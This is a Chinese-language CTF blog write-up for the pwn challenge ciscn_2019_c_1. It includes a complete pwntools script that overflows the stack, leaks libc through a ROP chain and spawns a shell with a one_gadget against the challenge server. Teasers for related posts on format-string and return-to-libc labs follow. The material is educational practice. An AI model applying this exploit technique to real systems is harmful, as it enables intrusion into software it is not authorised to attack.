ciscn_2019_c_1 WriteUp

发表于2023-10-23|更新于2024-12-14|CTF练习

|总字数:409|阅读时长:1分钟|浏览量:

考点

libc版本泄漏
ROP攻击
onegadget使用

解题过程

使用checksec工具进行查看，程序为64位，NX保护

checksec

使用ida工具反编译。

main:

main

encrypt：

encrypt

可以看出程序功能为对输入字符串进行加密，而加密encrypt函数中的get存在栈溢出漏洞。

由于在程序中找不到system函数和/bin/sh字符串，所以需要进行ROP攻击，泄漏其libc地址，使用onegadget工具直接获取shell。
使用ROPgadget工具获取泄漏libc地址所需的指令地址(pop rdi; )，然后获取程序中put_got表和put_plt表地址，执行栈溢出payload构造如下

1	payload = flat(b"\0", b"a"*(0x50-1), 0x0, pop_rdi, puts_got, puts_plt, encrypt)

注意最后需要加上encrypt函数使程序重新回到漏洞函数处。

获取libc基址后，再次进入漏洞函数，然后执行onegadget指令。获取shell。

结果

构造脚本如下

python：

from pwn import *

context(arch="amd64", log_level="debug")
# p = process("./ciscn_2019_c_1")
p = remote("node4.buuoj.cn", 26936)

one_gadget = 0x10a38c  # 0x4f322, 0x4f2c5, 0x10a38c
pop_rdi = 0x400c83
encrypt = 0x4009A0

elf = ELF('./ciscn_2019_c_1')
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']

libc = ELF('./libc-2.27.so')
puts_offset = libc.symbols['puts']

payload = flat(b"\0", b"a"*(0x50-1), 0x0, pop_rdi, puts_got, puts_plt, encrypt)
# gdb.attach(p, 'b *0x4009DD')
p.sendlineafter(b"Input your choice!", b'1')
p.sendlineafter(b'Input your Plaintext to be encrypted', payload)
p.recvuntil("\nCiphertext\n\n")
puts_addr = p.recv(6)
puts_addr = u64(puts_addr.ljust(8, b'\x00'))
success(hex(puts_addr))
libc_addr = puts_addr - puts_offset
success(hex(libc_addr))

one_gadget = libc_addr + one_gadget

payload = flat(b"\0", b'a'*(0x50-1), 0x0, one_gadget)
p.sendlineafter(b"Input your Plaintext to be encrypted", payload)


p.interactive()

成功获取flag

result

文章作者: Eutopia

文章链接: https://eknight-eutopia.github.io/posts/daa10577.html

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Small Utopia！

相关推荐

BUUCTF 第五空间PWN5

考点格式化字符串漏洞解题过程首先使用checksec工具查看基本信息为32位，canary，dep防护使用ida工具进行静态分析。 main main函数主要代码如上图所示，可以看见print((int)v7)存在格式化字符串输出漏洞，因此可以考虑进行利用（注：由于输入read限制了输入长度，导致无法通过泄漏canary方法来进行栈溢出攻击。）构造python脚本如下，主要思路为修改printf的got表plt地址为要执行的代码地址（若开启full relro则无法使用），然后再代码执行到下一次调用printf函数时会转去执行目标代码。获得shell。 1234567891011121314151617181920from pwn import *context(arch="i386", log_level="debug")# p = process("./pwn")p = remote("node4.buuoj.cn", 29338)elf =...

get_started_3dsctf_2016 WriteUp

考点对栈溢出函数带参数的溢出理解解题内容使用checksec工具查看基本信息： 1234567❯ ~/.local/bin/checksec ./get_started_3dsctf_2016[*] '/home/bronya/Documents/ctf/pwn/get_started_3dsctf_2016/get_started_3dsctf_2016' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE...

【SEED Lab2.0】Return_to_Libc实验报告

Task1：Finding out the Addresses of libc Functions 获取system函数和exit函数地址 gdb批处理命令，新建文件peda-session-retlib.txt，进行批处理操作 Task2：Putting the shell string in the memory 编写getprt.c来获取环境变量地址 getprt.c： 12345678#include<stdlib.h>#include<stdio.h>void main(){char* shell = getenv("MYSHELL");if (shell) printf("%x\n", (unsigned int)shell);} 设置/bin/sh的环境变量，获得地址：将代码加入到retlib.c中，获取到地址，可以发现地址与getprt的地址相同。（如果开启aslr或者两文件名长度不同则会不同） Task 3: Launching the...

【SeedLab】格式化字符串实验报告

1 Overviewprintf函数用于根据指定格式打印出字符串，第一个参数诶格式化字符串format string，格式化字符串中使用了%来作为占位符。如果不使用%占位符而是直接将变量放入格式化字符串，则存在格式化字符串漏洞，可能被恶意利用。 2 Environment Setup2.1 Turning of Countermeasure关闭ASLR 12❯ sudo sysctl -w kernel.randomize_va_space=0kernel.randomize_va_space = 0 2.2 The Vulnerable Program漏洞程序如下 format.c：myprintf存在漏洞printf(msg); 1234567891011121314151617181920212223242526void myprintf(char *msg){#if __x86_64__ unsigned long int *framep; // Save the rbp value into framep asm("movq...

评论

数据加载中